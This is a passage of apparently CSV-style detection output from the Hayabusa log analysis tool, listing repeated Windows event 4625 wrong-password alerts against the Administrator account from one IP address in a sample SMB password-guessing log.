NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: 